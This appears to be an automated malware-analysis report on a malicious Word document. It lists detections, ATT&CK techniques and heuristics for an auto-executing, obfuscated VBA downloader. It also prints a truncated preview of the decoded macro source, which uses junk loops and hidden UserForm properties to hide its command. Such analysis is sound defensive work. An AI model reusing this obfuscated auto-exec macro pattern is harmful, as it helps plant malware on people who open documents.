MALICIOUS
302
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample contains heavily obfuscated VBA macros, including a Document_Open auto-exec macro and a UserForm hidden-property command stager. These techniques are commonly used to download and execute additional malicious payloads. The presence of VBA macros and the Document_Open trigger strongly suggest a spearphishing attachment delivery vector.
Heuristics 8
-
ClamAV: Doc.Downloader.Generic-7458347-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Generic-7458347-0
-
VBA macros detected medium 5 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA UserForm hidden-property command stager critical OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGERVBA auto-exec macro creates a COM object from a decoded variable and reconstructs command text through Split/Join and hidden UserForm properties such as ControlTipText, Tag, Pages, or HelpContextId. This is a high-confidence macro downloader/loader shape seen in the reviewed OLE set, but it is not an Office CVE exploit primitive.
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 8163 bytes |
SHA-256: 97ff7005bf67411ae80b73bd74731604946a00a62b49827448b04e1b56f12a65 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Qduyotdq"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Olcvvgcpu, 0, 0, MSForms, TextBox"
Private Sub Document_open()
Dim Erfejzkre
Dim Dlduyajcukgfy
For Hzfiilfkxfr = Hjgxqqnkmj To 0
Djdvufgxveubk = xPI
Vymgxsskm = CDbl(3)
Lxagphwkzlgkk = Tan(MyeW5A)
Tlvkhyqa = 4 - Tkghlyrzutixp
Eavtoncnwyg = (3 - Obuwlhvw)
Nmokpzsw = Xcxvhakrx
Fjqltylli = CDbl(6)
Oyhgacmnecj = Tan(Lezplwey)
Next
Dim Nchplaqdilmgt
Dim Sjusnjlrt
For Vvyymewflmy = Hjgxqqnkmj To 0
Whafluhgm = xPI
Zuobnbkopx = CDbl(3)
Fjziknittepwg = Tan(MyeW5A)
Gysgjlozs = 4 - Rkckqhrlvvmm
Dppveruevdpw = (3 - Kqkgrowyrjoi)
Okulvngvzeny = Oyutpwbelfu
Eyfhwnapljebd = CDbl(6)
Rgttoiktpus = Tan(Kyprnrcxuxrl)
Next
Dim Qxvjextynctt
Dim Wzhekhysw
For Vrobrauj = Hjgxqqnkmj To 0
Fiqrywxxq = xPI
Wstjpaoaux = CDbl(3)
Ijfewvbyk = Tan(MyeW5A)
Rrrnllau = 4 - Szzusczf
Heahitrb = (3 - Nydocsxndpt)
Hpkgkesbtbow = Jestzsrmtvk
Emctkejsrxnhw = CDbl(6)
Uxpspboikv = Tan(Duwovreopq)
Next
Fqxykeabcrdq
End Sub
Attribute VB_Name = "Imbflwcbhkqt"
Attribute VB_Base = "0{06FDBFF6-7190-4AF9-848C-69D137893021}{528A5CCE-B07B-4879-B91F-4EAA09471225}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Flabyzniii"
Function Jcfwcvqskbat()
Dim Alxlfeacqca
Dim Lhmrotqlyld
For Vneogbyzwy = Hjgxqqnkmj To 0
Ibsozsuxvdrhq = xPI
Jcczuauj = CDbl(3)
Cwyfroivvgrxx = Tan(MyeW5A)
Inprvxxaboxu = 4 - Vnsgqxwwseojl
Imfeglnerrbev = (3 - Tujzaszqgaw)
Kdmldascspsk = Bpptaybltz
Gjvydjzstoeq = CDbl(6)
Eoafqprjybqh = Tan(Tzjmyiuihtl)
Next
Gadacpyms = Qduyotdq.Olcvvgcpu
Dim Rsfknplcysudk
Dim Zdxiplvaky
For Fwxlujzhyp = Hjgxqqnkmj To 0
Socznjrrn = xPI
Vfiqkwsu = CDbl(3)
Gggahaukxm = Tan(MyeW5A)
Rqbjvmbhj = 4 - Tbfmspkgvkt
Vzfjxgpds = (3 - Rpbbfseclqm)
Nbvmgowy = Nwgsjcfmbnru
Jacfqasjadv = CDbl(6)
Dwdrpnwney = Tan(Zfdklktxhcfm)
Next
Ryltithjlio = Gadacpyms + Imbflwcbhkqt.Kfrbjzohmore + Imbflwcbhkqt.Gmryogxxbyy + Imbflwcbhkqt.Pofmtemuqhhg
Dim Kpiwdmfurbjda
Dim Utboewopep
For Neiqktkzffsym = Hjgxqqnkmj To 0
Bwdnwuphoqnhb = xPI
Egcosqjk = CDbl(3)
Pldobdbdwn = Tan(MyeW5A)
Cddyxtzw = 4 - Debmvyijrl
Hjltnnle = (3 - Hdezkutql)
Giymphdunvhwy = Mefmlieuxyhw
Qbzbfbangxf = CDbl(6)
Rnzgfcqipk = Tan(Pbnbohlqfwt)
Next
Posivhjaigymy = Ryltithjlio + Imbflwcbhkqt.Qatckaozy + Imbflwcbhkqt.Aytrcolpn
Dim Hvlcyeyql
Dim Msullgbxtr
For Qfucloymdix = Hjgxqqnkmj To 0
Gjnpuxtedy = xPI
Ydbwbsri = CDbl(3)
Wdcncnpheuob = Tan(MyeW5A)
Nhytflmhmzmlw = 4 - Pgyelmjn
Gowumnwyeiut = (3 - Thpqcaqq)
Ooqwtketr = Xqmalqnrhhviv
Wslhfpoq = CDbl(6)
Xaftdaczcwrdq = Tan(Dzsysgulpo)
Next
Jcfwcvqskbat = Bgbrzmhsoxtma + Posivhjaigymy + Bgbrzmhsoxtma
Dim Oubsnkjd
Dim Yajebrtdjcb
For Augzuwklfdgd = Hjgxqqnkmj To 0
Ieiclwncbm = xPI
Aidegzqzbxg = CDbl(3)
Hudswcajhky = Tan(MyeW5A)
Qbgxtujg = 4 - Iaxgnrik
Nebkkejpdsyed = (3 - Otdelbilsv)
Vnrzzzdnlavno = Ddedxrxyyfgm
Tjosfoclt = CDbl(6)
Zsxoxppbh = Tan(Osuhyottt)
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.